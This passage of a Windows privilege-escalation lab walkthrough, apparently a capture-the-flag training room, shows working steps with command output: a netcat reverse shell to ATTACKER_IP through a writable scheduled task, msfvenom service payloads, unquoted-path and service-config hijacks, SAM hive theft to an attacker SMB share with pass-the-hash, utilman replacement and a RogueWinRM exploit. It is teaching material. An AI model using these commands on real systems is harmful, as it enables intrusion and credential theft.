HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s 100 | ``` 101 | 102 | Note: Simon Tatham is the creator of PuTTY (and his name is part of the path), not the username for which we are retrieving the password. The stored proxy username should also be visible after running the command above. 103 | 104 | Just as putty stores credentials, any software that stores passwords, including browsers, email clients, FTP clients, SSH clients, VNC software and others, will have methods to recover any passwords the user has saved. 105 | 106 | # Other Quick Wins 107 | Privilege escalation is not always a challenge. Some misconfigurations can allow you to obtain higher privileged user access and, in some cases, even administrator access. It would help if you considered these to belong more to the realm of CTF events rather than scenarios you will encounter during real penetration testing engagements. However, if none of the previously mentioned methods works, you can always go back to these. 108 | 109 | Scheduled Tasks 110 | 111 | Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify. 112 | 113 | Scheduled tasks can be listed from the command line using the `schtasks` command without any options. To retrieve detailed information about any of the services, you can use a command like the following one: 114 | 115 | ``` 116 | C:\> schtasks /query /tn vulntask /fo list /v 117 | Folder:\ 118 | HostName: THM-PC1 119 | TaskName: \vulntask 120 | Task To Run: C:\tasks\schtask.bat 121 | Run As User: taskusr1 122 | ``` 123 | 124 | You will get lots of information about the task, but what matters for us is the "Task to Run" parameter which indicates what gets executed by the scheduled task, and the "Run As User" parameter, which shows the user that will be used to execute the task. 125 | 126 | If our current user can modify or overwrite the "Task to Run" executable, we can control what gets executed by the taskusr1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, we use `icacls`: 127 | 128 | ``` 129 | C:\> icacls c:\tasks\schtask.bat 130 | c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F) 131 | BUILTIN\Administrators:(I)(F) 132 | BUILTIN\Users:(I)(F) 133 | ``` 134 | 135 | As can be seen in the result, the BUILTIN\Users group has full access (F) over the task's binary. This means we can modify the .bat file and insert any payload we like. For your convenience, `nc64.exe` can be found on `C:\tools`. Let's change the bat file to spawn a reverse shell: 136 | 137 | ``` 138 | C:\> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat 139 | ``` 140 | 141 | We then start a listener on the attacker machine on the same port we indicated on our reverse shell: 142 | 143 | ``` 144 | nc -lvp 4444 145 | ``` 146 | 147 | The next time the scheduled task runs, you should receive the reverse shell with taskusr1 privileges. While you probably wouldn't be able to start the task in a real scenario and would have to wait for the scheduled task to trigger, we have provided your user with permissions to start the task manually to save you some time. We can run the task with the following command: 148 | 149 | ``` 150 | C:\> schtasks /run /tn vulntask 151 | ``` 152 | 153 | And you will receive the reverse shell with taskusr1 privileges as expected: 154 | 155 | Kali Linux 156 | 157 | ``` 158 | user@attackerpc$ nc -lvp 4444 159 | Listening on 0.0.0.0 4444 160 | Connection received on 10.10.175.90 50649 161 | Microsoft Windows [Version 10.0.17763.1821] 162 | (c) 2018 Microsoft Corporation. All rights reserved. 163 | 164 | C:\Windows\system32>whoami 165 | wprivesc1\taskusr1 166 | ``` 167 | 168 | Go to taskusr1 desktop to retrieve a flag. Don't forget to input the flag at the end of this task. 169 | 170 | ## AlwaysInstallElevated 171 | 172 | Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges. 173 | 174 | Note: The AlwaysInstallElevated method won't work on this room's machine and it's included as information only. 175 | 176 | This method requires two registry values to be set. You can query these from the command line using the commands below. 177 | 178 | ``` 179 | C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer 180 | C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer 181 | ``` 182 | 183 | To be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be possible. If these are set, you can generate a malicious .msi file using `msfvenom`, as seen below: 184 | 185 | ``` 186 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi 187 | ``` 188 | 189 | As this is a reverse shell, you should also run the Metasploit Handler module configured accordingly. Once you have transferred the file you have created, you can run the installer with the command below and receive the reverse shell: 190 | 191 | ``` 192 | C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi 193 | ``` 194 | 195 | # Abusing Service Misconfigurations 196 | ## Windows Services 197 | 198 | Windows services are managed by the Service Control Manager (SCM). The SCM is a process in charge of managing the state of services as needed, checking the current status of any given service and generally providing a way to configure services. 199 | 200 | Each service on a Windows machine will have an associated executable which will be run by the SCM whenever a service is started. It is important to note that service executables implement special functions to be able to communicate with the SCM, and therefore not any executable can be started as a service successfully. Each service also specifies the user account under which the service will run. 201 | 202 | To better understand the structure of a service, let's check the apphostsvc service configuration with the `sc qc` command: 203 | 204 | ``` 205 | C:\> sc qc apphostsvc 206 | [SC] QueryServiceConfig SUCCESS 207 | 208 | SERVICE_NAME: apphostsvc 209 | TYPE : 20 WIN32_SHARE_PROCESS 210 | START_TYPE : 2 AUTO_START 211 | ERROR_CONTROL : 1 NORMAL 212 | BINARY_PATH_NAME : C:\Windows\system32\svchost.exe -k apphost 213 | LOAD_ORDER_GROUP : 214 | TAG : 0 215 | DISPLAY_NAME : Application Host Helper Service 216 | DEPENDENCIES : 217 | SERVICE_START_NAME : localSystem 218 | ``` 219 | 220 | Here we can see that the associated executable is specified through the BINARY_PATH_NAME parameter, and the account used to run the service is shown on the SERVICE_START_NAME parameter. 221 | 222 | Services have a Discretionary Access Control List (DACL), which indicates who has permission to start, stop, pause, query status, query configuration, or reconfigure the service, amongst other privileges. The DACL can be seen from Process Hacker (available on your machine's desktop): 223 | 224 | ![Service DACL](images/d8244cfd9d64a7be30f5fb0308fd0806.png) 225 | 226 | All of the services configurations are stored on the registry under `HKLM\SYSTEM\CurrentControlSet\Services\`: 227 | 228 | ![Service registry entries](images/06c05c134e4922ec8ff8d9b56382c58f.png) 229 | 230 | A subkey exists for every service in the system. Again, we can see the associated executable on the ImagePath value and the account used to start the service on the ObjectName value. If a DACL has been configured for the service, it will be stored in a subkey called Security. As you have guessed by now, only administrators can modify such registry entries by default. 231 | 232 | ## Insecure Permissions on Service Executable 233 | 234 | If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially. 235 | 236 | To understand how this works, let's look at a vulnerability found on Splinterware System Scheduler. To start, we will query the service configuration using `sc`: 237 | 238 | ``` 239 | C:\> sc qc WindowsScheduler 240 | [SC] QueryServiceConfig SUCCESS 241 | 242 | SERVICE_NAME: windowsscheduler 243 | TYPE : 10 WIN32_OWN_PROCESS 244 | START_TYPE : 2 AUTO_START 245 | ERROR_CONTROL : 0 IGNORE 246 | BINARY_PATH_NAME : C:\PROGRA~2\SYSTEM~1\WService.exe 247 | LOAD_ORDER_GROUP : 248 | TAG : 0 249 | DISPLAY_NAME : System Scheduler Service 250 | DEPENDENCIES : 251 | SERVICE_START_NAME : .\svcuser1 252 | ``` 253 | 254 | We can see that the service installed by the vulnerable software runs as svcuser1 and the executable associated with the service is in `C:\Progra~2\System~1\WService.exe`. We then proceed to check the permissions on the executable: 255 | 256 | ``` 257 | C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe 258 | C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M) 259 | NT AUTHORITY\SYSTEM:(I)(F) 260 | BUILTIN\Administrators:(I)(F) 261 | BUILTIN\Users:(I)(RX) 262 | APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) 263 | APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) 264 | 265 | Successfully processed 1 files; Failed processing 0 files 266 | ``` 267 | 268 | And here we have something interesting. The Everyone group has modify permissions (M) on the service's executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of the configured user account. 269 | 270 | Let's generate an exe-service payload using msfvenom and serve it through a python webserver: 271 | 272 | Kali Linux 273 | 274 | ``` 275 | user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe 276 | 277 | user@attackerpc$ python3 -m http.server 278 | Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 279 | ``` 280 | 281 | We can then pull the payload from Powershell with the following command: 282 | 283 | Powershell 284 | 285 | ``` 286 | wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe 287 | ``` 288 | 289 | Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well: 290 | 291 | ``` 292 | C:\> cd C:\PROGRA~2\SYSTEM~1 293 | 294 | C:\PROGRA~2\SYSTEM~1> move WService.exe WService.exe.bkp 295 | 1 file(s) moved. 296 | 297 | C:\PROGRA~2\SYSTEM~1> move C:\Users\thm-unpriv\rev-svc.exe WService.exe 298 | 1 file(s) moved. 299 | 300 | C:\PROGRA~2\SYSTEM~1> icacls WService.exe /grant Everyone:F 301 | Successfully processed 1 files. 302 | ``` 303 | 304 | We start a reverse listener on our attacker machine: 305 | 306 | Kali Linux 307 | 308 | ``` 309 | user@attackerpc$ nc -lvp 4445 310 | ``` 311 | 312 | And finally, restart the service. While in a normal scenario, you would likely have to wait for a service restart, you have been assigned privileges to restart the service yourself to save you some time. Use the following commands from a cmd.exe command prompt: 313 | 314 | ``` 315 | C:\> sc stop windowsscheduler 316 | C:\> sc start windowsscheduler 317 | ``` 318 | 319 | Note: PowerShell has `sc` as an alias to `Set-Content`, therefore you need to use `sc.exe` in order to control services with PowerShell this way. 320 | 321 | As a result, you'll get a reverse shell with svcusr1 privileges: 322 | 323 | Kali Linux 324 | 325 | ``` 326 | user@attackerpc$ nc -lvp 4445 327 | Listening on 0.0.0.0 4445 328 | Connection received on 10.10.175.90 50649 329 | Microsoft Windows [Version 10.0.17763.1821] 330 | (c) 2018 Microsoft Corporation. All rights reserved. 331 | 332 | C:\Windows\system32>whoami 333 | wprivesc1\svcusr1 334 | ``` 335 | 336 | Go to svcusr1 desktop to retrieve a flag. Don't forget to input the flag at the end of this task. 337 | 338 | ## Unquoted Service Paths 339 | 340 | When we can't directly write into service executables as before, there might still be a chance to force a service into running arbitrary executables by using a rather obscure feature. 341 | 342 | When working with Windows services, a very particular behaviour occurs when the service is configured to point to an "unquoted" executable. By unquoted, we mean that the path of the associated executable isn't properly quoted to account for spaces on the command. 343 | 344 | As an example, let's look at the difference between two services (these services are used as examples only and might not be available in your machine). The first service will use a proper quotation so that the SCM knows without a doubt that it has to execute the binary file pointed by `"C:\Program Files\RealVNC\VNC Server\vncserver.exe"`, followed by the given parameters: 345 | 346 | ``` 347 | C:\> sc qc "vncserver" 348 | [SC] QueryServiceConfig SUCCESS 349 | 350 | SERVICE_NAME: vncserver 351 | TYPE : 10 WIN32_OWN_PROCESS 352 | START_TYPE : 2 AUTO_START 353 | ERROR_CONTROL : 0 IGNORE 354 | BINARY_PATH_NAME : "C:\Program Files\RealVNC\VNC Server\vncserver.exe" -service 355 | LOAD_ORDER_GROUP : 356 | TAG : 0 357 | DISPLAY_NAME : VNC Server 358 | DEPENDENCIES : 359 | SERVICE_START_NAME : LocalSystem 360 | ``` 361 | 362 | Remember: PowerShell has 'sc' as an alias to 'Set-Content', therefore you need to use 'sc.exe' to control services if you are in a PowerShell prompt.\ 363 | Now let's look at another service without proper quotation: 364 | 365 | ``` 366 | C:\> sc qc "disk sorter enterprise" 367 | [SC] QueryServiceConfig SUCCESS 368 | 369 | SERVICE_NAME: disk sorter enterprise 370 | TYPE : 10 WIN32_OWN_PROCESS 371 | START_TYPE : 2 AUTO_START 372 | ERROR_CONTROL : 0 IGNORE 373 | BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe 374 | LOAD_ORDER_GROUP : 375 | TAG : 0 376 | DISPLAY_NAME : Disk Sorter Enterprise 377 | DEPENDENCIES : 378 | SERVICE_START_NAME : .\svcusr2 379 | ``` 380 | 381 | When the SCM tries to execute the associated binary, a problem arises. Since there are spaces on the name of the "Disk Sorter Enterprise" folder, the command becomes ambiguous, and the SCM doesn't know which of the following you are trying to execute: 382 | 383 | | Command | Argument 1 | Argument 2 | 384 | | --- | --- | --- | 385 | | C:\MyPrograms\Disk.exe | Sorter | Enterprise\bin\disksrs.exe | 386 | | C:\MyPrograms\Disk Sorter.exe | Enterprise\bin\disksrs.exe | | 387 | | C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe | | | 388 | 389 | This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators unless they are part of a quoted string. This means the "right" interpretation of the unquoted command would be to execute `C:\\MyPrograms\\Disk.exe` and take the rest as arguments. 390 | 391 | Instead of failing as it probably should, SCM tries to help the user and starts searching for each of the binaries in the order shown in the table: 392 | 393 | 1. First, search for `C:\\MyPrograms\\Disk.exe`. If it exists, the service will run this executable. 394 | 2. If the latter doesn't exist, it will then search for `C:\\MyPrograms\\Disk Sorter.exe`. If it exists, the service will run this executable. 395 | 3. If the latter doesn't exist, it will then search for `C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe`. This option is expected to succeed and will typically be run in a default installation. 396 | 397 | From this behaviour, the problem becomes evident. If an attacker creates any of the executables that are searched for before the expected service executable, they can force the service to run an arbitrary executable. 398 | 399 | While this sounds trivial, most of the service executables will be installed under `C:\Program Files` or `C:\Program Files (x86)` by default, which isn't writable by unprivileged users. This prevents any vulnerable service from being exploited. There are exceptions to this rule: - Some installers change the permissions on the installed folders, making the services vulnerable. - An administrator might decide to install the service binaries in a non-default path. If such a path is world-writable, the vulnerability can be exploited. 400 | 401 | In our case, the Administrator installed the Disk Sorter binaries under `c:\MyPrograms`. By default, this inherits the permissions of the `C:\` directory, which allows any user to create files and folders in it. We can check this using `icacls`: 402 | 403 | ``` 404 | C:\>icacls c:\MyPrograms 405 | c:\MyPrograms NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) 406 | BUILTIN\Administrators:(I)(OI)(CI)(F) 407 | BUILTIN\Users:(I)(OI)(CI)(RX) 408 | BUILTIN\Users:(I)(CI)(AD) 409 | BUILTIN\Users:(I)(CI)(WD) 410 | CREATOR OWNER:(I)(OI)(CI)(IO)(F) 411 | 412 | Successfully processed 1 files; Failed processing 0 files 413 | ``` 414 | 415 | The `BUILTIN\\Users` group has AD and WD privileges, allowing the user to create subdirectories and files, respectively. 416 | 417 | The process of creating an exe-service payload with msfvenom and transferring it to the target host is the same as before, so feel free to create the following payload and upload it to the server as before. We will also start a listener to receive the reverse shell when it gets executed: 418 | 419 | Kali Linux 420 | 421 | ``` 422 | user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe 423 | 424 | user@attackerpc$ nc -lvp 4446 425 | ``` 426 | 427 | Once the payload is in the server, move it to any of the locations where hijacking might occur. In this case, we will be moving our payload to `C:\MyPrograms\Disk.exe`. We will also grant Everyone full permissions on the file to make sure it can be executed by the service: 428 | 429 | ``` 430 | C:\> move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe 431 | 432 | C:\> icacls C:\MyPrograms\Disk.exe /grant Everyone:F 433 | Successfully processed 1 files. 434 | ``` 435 | 436 | Once the service gets restarted, your payload should execute: 437 | 438 | ``` 439 | C:\> sc stop "disk sorter enterprise" 440 | C:\> sc start "disk sorter enterprise" 441 | ``` 442 | 443 | As a result, you'll get a reverse shell with svcusr2 privileges: 444 | 445 | Kali Linux 446 | 447 | ``` 448 | user@attackerpc$ nc -lvp 4446 449 | Listening on 0.0.0.0 4446 450 | Connection received on 10.10.175.90 50650 451 | Microsoft Windows [Version 10.0.17763.1821] 452 | (c) 2018 Microsoft Corporation. All rights reserved. 453 | 454 | C:\Windows\system32>whoami 455 | wprivesc1\svcusr2 456 | ``` 457 | 458 | Go to svcusr2 desktop to retrieve a flag. Don't forget to input the flag at the end of this task. 459 | 460 | ## Insecure Service Permissions 461 | 462 | You might still have a slight chance of taking advantage of a service if the service's executable DACL is well configured, and the service's binary path is rightly quoted. Should the service DACL (not the service's executable DACL) allow you to modify the configuration of a service, you will be able to reconfigure the service. This will allow you to point to any executable you need and run it with any account you prefer, including SYSTEM itself. 463 | 464 | To check for a service DACL from the command line, you can use [Accesschk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) from the Sysinternals suite. For your convenience, a copy is available at `C:\\tools`. The command to check for the thmservice service DACL is: 465 | 466 | ``` 467 | C:\tools\AccessChk> accesschk64.exe -qlc thmservice 468 | [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM 469 | SERVICE_QUERY_STATUS 470 | SERVICE_QUERY_CONFIG 471 | SERVICE_INTERROGATE 472 | SERVICE_ENUMERATE_DEPENDENTS 473 | SERVICE_PAUSE_CONTINUE 474 | SERVICE_START 475 | SERVICE_STOP 476 | SERVICE_USER_DEFINED_CONTROL 477 | READ_CONTROL 478 | [4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users 479 | SERVICE_ALL_ACCESS 480 | ``` 481 | 482 | Here we can see that the `BUILTIN\\Users` group has the SERVICE_ALL_ACCESS permission, which means any user can reconfigure the service. 483 | 484 | Before changing the service, let's build another exe-service reverse shell and start a listener for it on the attacker's machine: 485 | 486 | Kali Linux 487 | 488 | ``` 489 | user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe 490 | 491 | user@attackerpc$ nc -lvp 4447 492 | ``` 493 | 494 | We will then transfer the reverse shell executable to the target machine and store it in `C:\Users\thm-unpriv\rev-svc3.exe`. Feel free to use wget to transfer your executable and move it to the desired location. Remember to grant permissions to Everyone to execute your payload: 495 | 496 | ``` 497 | C:\> icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F 498 | ``` 499 | 500 | To change the service's associated executable and account, we can use the following command (mind the spaces after the equal signs when using sc.exe): 501 | 502 | ``` 503 | C:\> sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem 504 | ``` 505 | 506 | Notice we can use any account to run the service. We chose LocalSystem as it is the highest privileged account available. To trigger our payload, all that rests is restarting the service: 507 | 508 | ``` 509 | C:\> sc stop THMService 510 | C:\> sc start THMService 511 | ``` 512 | 513 | And we will receive a shell back in our attacker's machine with SYSTEM privileges: 514 | 515 | Kali Linux 516 | 517 | ``` 518 | user@attackerpc$ nc -lvp 4447 519 | Listening on 0.0.0.0 4447 520 | Connection received on 10.10.175.90 50650 521 | Microsoft Windows [Version 10.0.17763.1821] 522 | (c) 2018 Microsoft Corporation. All rights reserved. 523 | 524 | C:\Windows\system32>whoami 525 | NT AUTHORITY\SYSTEM 526 | ``` 527 | 528 | Go to the Administrator's desktop to retrieve a flag. Don't forget to input the flag at the end of this task. 529 | 530 | # Abusing dangerous privileges 531 | ## Windows Privileges 532 | 533 | Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some DACL-based access controls. 534 | 535 | Each user has a set of assigned privileges that can be checked with the following command: 536 | 537 | ``` 538 | whoami /priv 539 | ``` 540 | 541 | A complete list of available privileges on Windows systems is available [here](https://docs.microsoft.com/en-us/windows/win32/secauthz/privilege-constants). From an attacker's standpoint, only those privileges that allow us to escalate in the system are of interest. You can find a comprehensive list of exploitable privileges on the [Priv2Admin](https://github.com/gtworek/Priv2Admin) Github project. 542 | 543 | While we won't take a look at each of them, we will showcase how to abuse some of the most common privileges you can find. 544 | 545 | ## SeBackup / SeRestore 546 | 547 | The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges. 548 | 549 | Having this power, an attacker can trivially escalate privileges on the system by using many techniques. The one we will look at consists of copying the SAM and SYSTEM registry hives to extract the local Administrator's password hash. 550 | 551 | This account is part of the "Backup Operators" group, which by default is granted the SeBackup and SeRestore privileges. We will need to open a command prompt using the "Open as administrator" option to use these privileges. We will be asked to input our password again to get an elevated console: 552 | 553 | ![Run as admin](images/befb434f15dbd4deee0654f8b6ef6de0.png) 554 | 555 | Once on the command prompt, we can check our privileges with the following command: 556 | 557 | ``` 558 | C:\> whoami /priv 559 | 560 | ## PRIVILEGES INFORMATION 561 | 562 | Privilege Name Description State 563 | ============================= ============================== ======== 564 | SeBackupPrivilege Back up files and directories Disabled 565 | SeRestorePrivilege Restore files and directories Disabled 566 | SeShutdownPrivilege Shut down the system Disabled 567 | SeChangeNotifyPrivilege Bypass traverse checking Enabled 568 | SeIncreaseWorkingSetPrivilege Increase a process working set Disabled 569 | ``` 570 | 571 | To backup the SAM and SYSTEM hashes, we can use the following commands: 572 | 573 | ``` 574 | C:\> reg save hklm\system C:\Users\THMBackup\system.hive 575 | The operation completed successfully. 576 | 577 | C:\> reg save hklm\sam C:\Users\THMBackup\sam.hive 578 | The operation completed successfully. 579 | ``` 580 | 581 | This will create a couple of files with the registry hives content. We can now copy these files to our attacker machine using SMB or any other available method. For SMB, we can use impacket's `smbserver.py` to start a simple SMB server with a network share in the current directory of our AttackBox: 582 | 583 | Kali Linux 584 | 585 | ``` 586 | user@attackerpc$ mkdir share 587 | user@attackerpc$ python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share 588 | ``` 589 | 590 | This will create a share named `public` pointing to the `share` directory, which requires the username and password of our current windows session. After this, we can use the `copy` command in our windows machine to transfer both files to our AttackBox:  591 | 592 | ``` 593 | C:\> copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\ 594 | C:\> copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public 595 | 596 | ``` 597 | 598 | And use impacket to retrieve the users' password hashes: 599 | 600 | Kali Linux 601 | 602 | ``` 603 | user@attackerpc$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL 604 | Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation 605 | 606 | [*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821 607 | [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) 608 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94::: 609 | Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 610 | 611 | ``` 612 | 613 | We can finally use the Administrator's hash to perform a Pass-the-Hash attack and gain access to the target machine with SYSTEM privileges: 614 | 615 | Kali Linux 616 | 617 | ``` 618 | user@attackerpc$ python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@MACHINE_IP 619 | Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation 620 | 621 | [*] Requesting shares on 10.10.175.90..... 622 | [*] Found writable share ADMIN$ 623 | [*] Uploading file nfhtabqO.exe 624 | [*] Opening SVCManager on 10.10.175.90..... 625 | [*] Creating service RoLE on 10.10.175.90..... 626 | [*] Starting service RoLE..... 627 | [!] Press help for extra shell commands 628 | Microsoft Windows [Version 10.0.17763.1821] 629 | (c) 2018 Microsoft Corporation. All rights reserved. 630 | 631 | C:\Windows\system32> whoami 632 | nt authority\system 633 | ``` 634 | 635 | SeTakeOwnership 636 | 637 | The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges, as we could, for example, search for a service running as SYSTEM and take ownership of the service's executable. For this task, we will be taking a different route, however. 638 | 639 | To get the SeTakeOwnership privilege, we need to open a command prompt using the "Open as administrator" option. We will be asked to input our password to get an elevated console: 640 | 641 | ![Run as admin](images/33303d0cde736589d2838ee894379ff2.png) 642 | 643 | Once on the command prompt, we can check our privileges with the following command: 644 | 645 | ``` 646 | C:\> whoami /priv 647 | 648 | ## PRIVILEGES INFORMATION 649 | 650 | Privilege Name Description State 651 | ============================= ======================================== ======== 652 | SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled 653 | SeChangeNotifyPrivilege Bypass traverse checking Enabled 654 | SeIncreaseWorkingSetPrivilege Increase a process working set Disabled 655 | ``` 656 | 657 | We'll abuse `utilman.exe` to escalate privileges this time. Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen: 658 | 659 | ![utilman normal behaviour](images/a5437a609e41d982b320967667e9b97a.png) 660 | 661 | Since Utilman is run with SYSTEM privileges, we will effectively gain SYSTEM privileges if we replace the original binary for any payload we like. As we can take ownership of any file, replacing it is trivial. 662 | 663 | To replace utilman, we will start by taking ownership of it with the following command: 664 | 665 | ``` 666 | C:\> takeown /f C:\Windows\System32\Utilman.exe 667 | 668 | SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WINPRIVESC2\thmtakeownership". 669 | ``` 670 | 671 | Notice that being the owner of a file doesn't necessarily mean that you have privileges over it, but being the owner you can assign yourself any privileges you need. To give your user full permissions over utilman.exe you can use the following command: 672 | 673 | ``` 674 | C:\> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F 675 | processed file: Utilman.exe 676 | Successfully processed 1 files; Failed processing 0 files 677 | ``` 678 | 679 | After this, we will replace utilman.exe with a copy of cmd.exe: 680 | 681 | ``` 682 | C:\Windows\System32\> copy cmd.exe utilman.exe 683 | 1 file(s) copied. 684 | ``` 685 | 686 | To trigger utilman, we will lock our screen from the start button: 687 | 688 | ![lock screen](images/dd7290ca93369cee33182023cb9190ff.png) 689 | 690 | And finally, proceed to click on the "Ease of Access" button, which runs utilman.exe with SYSTEM privileges. Since we replaced it with a cmd.exe copy, we will get a command prompt with SYSTEM privileges: 691 | 692 | ![utilman shell](images/1401bc3dcb1e4eb84f526b95567a5ef8.png) 693 | 694 | ## SeImpersonate / SeAssignPrimaryToken 695 | 696 | These privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user. 697 | 698 | Impersonation is easily understood when you think about how an FTP server works. The FTP server must restrict users to only access the files they should be allowed to see. 699 | 700 | Let's assume we have an FTP service running with user `ftp`. Without impersonation, if user Ann logs into the FTP server and tries to access her files, the FTP service would try to access them with its access token rather than Ann's: 701 | 702 | ![FTP server without impersonation](images/006115497113a0a4f03008028dc32fb7.png) 703 | 704 | There are several reasons why using ftp's token is not the best idea: - For the files to be served correctly, they would need to be accessible to the `ftp` user. In the example above, the FTP service would be able to access Ann's files, but not Bill's files, as the DACL in Bill's files doesn't allow user `ftp`. This adds complexity as we must manually configure specific permissions for each served file/directory. - For the operating system, all files are accessed by user `ftp`, independent of which user is currently logged in to the FTP service. This makes it impossible to delegate the authorisation to the operating system; therefore, the FTP service must implement it. - If the FTP service were compromised at some point, the attacker would immediately gain access to all of the folders to which the `ftp` user has access. 705 | 706 | If, on the other hand, the FTP service's user has the SeImpersonate or SeAssignPrimaryToken privilege, all of this is simplified a bit, as the FTP service can temporarily grab the access token of the user logging in and use it to perform any task on their behalf: 707 | 708 | ![FTP server with impersonation](images/c25de66ae7777169d09a61ce2fb38e28.png) 709 | 710 | Now, if user Ann logs in to the FTP service and given that the ftp user has impersonation privileges, it can borrow Ann's access token and use it to access her files. This way, the files don't need to provide access to user `ftp` in any way, and the operating system handles authorisation. Since the FTP service is impersonating Ann, it won't be able to access Jude's or Bill's files during that session. 711 | 712 | As attackers, if we manage to take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process. 713 | 714 | In Windows systems, you will find that the LOCAL SERVICE and NETWORK SERVICE ACCOUNTS already have such privileges. Since these accounts are used to spawn services using restricted accounts, it makes sense to allow them to impersonate connecting users if the service needs. Internet Information Services (IIS) will also create a similar default account called "iis apppool\defaultapppool" for web applications. 715 | 716 | To elevate privileges using such accounts, an attacker needs the following: 1. To spawn a process so that users can connect and authenticate to it for impersonation to occur. 2. Find a way to force privileged users to connect and authenticate to the spawned malicious process. 717 | 718 | We will use RogueWinRM exploit to accomplish both conditions. 719 | 720 | Let's start by assuming we have already compromised a website running on IIS and that we have planted a web shell on the following address: 721 | 722 | `http://MACHINE_IP/` 723 | 724 | We can use the web shell to check for the assigned privileges of the compromised account and confirm we hold both privileges of interest for this task: 725 | 726 | ![Webshell impersonate privileges](images/4603506a36f4bbda602dc67cdc845d9f.png) 727 | 728 | To use RogueWinRM, we first need to upload the exploit to the target machine. For your convenience, this has already been done, and you can find the exploit in the `C:\tools\` folder. 729 | 730 | The RogueWinRM exploit is possible because whenever a user (including unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges. Port 5985 is typically used for the WinRM service, which is simply a port that exposes a Powershell console to be used remotely through the network. Think of it like SSH, but using Powershell. 731 | 732 | If, for some reason, the WinRM service isn't running on the victim server, an attacker can start a fake WinRM service on port 5985 and catch the authentication attempt made by the BITS service when starting. If the attacker has SeImpersonate privileges, he can execute any command on behalf of the connecting user, which is SYSTEM. 733 | 734 | Before running the exploit, we'll start a netcat listener to receive a reverse shell on our attacker's machine: 735 | 736 | Kali Linux 737 | 738 | ``` 739 | user@attackerpc$ nc -lvp 4442 740 | ``` 741 | 742 | And then, use our web shell to trigger the RogueWinRM exploit using the following command: 743 | 744 | ``` 745 | c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442" 746 | ``` 747 | 748 | ![RogueWinRM exploit execution](images/24545e313a2e5ddee2386a68b4c7adeb.png) 749 | 750 | Note: The exploit may take up to 2 minutes to work, so your browser may appear as 